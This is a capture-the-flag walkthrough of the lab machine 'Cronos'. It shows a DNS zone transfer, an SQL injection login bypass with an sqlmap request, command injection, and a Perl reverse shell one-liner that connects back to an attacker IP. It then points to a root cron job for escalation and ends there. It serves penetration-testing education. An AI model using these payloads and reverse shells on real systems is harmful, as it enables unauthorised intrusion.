Today we’re going to solve another CTF machine “Cronos”. It is now retired box and can be accessible if you’re a VIP member.
Introduction
Specifications
- Target OS: Linux
- Services: SSH, HTTP, ISC Bind
- IP Address: 10.10.10.13
- Difficulty: Medium
Weakness
- SQL Injection
- Cron running as root
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
Dig
After spending some time on enumerating directories we found nothing. So i thought to do some digging and thought to dig.
dig axfr @10.10.10.13 cronos.htb ; <<>> DiG 9.10.6-Debian <<>> axfr @10.10.10.13 cronos.htb ; (1 server found) ;; global options: +cmd cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 cronos.htb. 604800 IN NS ns1.cronos.htb. cronos.htb. 604800 IN A 10.10.10.13 admin.cronos.htb. 604800 IN A 10.10.10.13 ns1.cronos.htb. 604800 IN A 10.10.10.13 www.cronos.htb. 604800 IN A 10.10.10.13 cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800 ;; Query time: 311 msec ;; SERVER: 10.10.10.13#53(10.10.10.13) ;; WHEN: Wed Nov 28 17:22:46 CET 2018 ;; XFR size: 7 records (messages 1, bytes 203)
We found admin.cronos.htb and after adding that into /etc/hosts we found an administrator login page.
Login
We can try Brute Forcing with different wordlists and usernames but it didn’t work. Then we gave a shot to SQLi and tried SQLMap.
sqlmap -r sqlmap.req --level=5 --risk=3
Inside sqlmap.req we have our POST method.
POST / HTTP/1.1 Host: admin.cronos.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://admin.cronos.htb/ Cookie: PHPSESSID=dnurhq6mp01mvc7thl7t4v56t3 DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 29 username=admin&password=admin
It appears that Username field is vulnerable to SQL injection.
OR manually we can try different methods for more info you can real OWASP SQL injection wiki.
Try admin’– – as username and use random password.
Command Injection
Since we have a command injection we can simply bypass it by placing ‘;’ in the end.
Example 6: https://www.owasp.org/index.php/Command_Injection
Let’s get a reverse shell.
Since we had Perl installed so we have to use Perl reverse shell.
;perl -e 'use Socket;$i="10.10.14.4";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
And we got shell.
Privilege Escalation
Since we have a user now we’re going after root. Now we have to escalate privileges to become root. Let’s run some privilege escalation scripts to get some basic information.
Normally I use LinEnum.sh script which collect some important information. After doing some research and i found that inside crontab we’ve a command schedule which runs a file as root.
$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
Since we have a command running inside crontab as root we can spawn php reverse shell easily.
